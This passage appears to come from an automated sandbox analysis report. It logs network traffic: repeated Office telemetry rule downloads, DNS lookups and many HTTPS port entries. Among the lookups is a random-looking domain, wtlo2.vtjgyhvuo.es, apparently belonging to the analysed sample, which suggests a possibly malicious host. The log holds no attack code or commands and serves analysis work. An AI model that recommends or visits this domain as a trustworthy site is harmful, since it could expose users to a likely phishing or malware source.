              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficDNS traffic detected: DNS query: wtlo2.vtjgyhvuo.es
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: e2c47.gcp.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
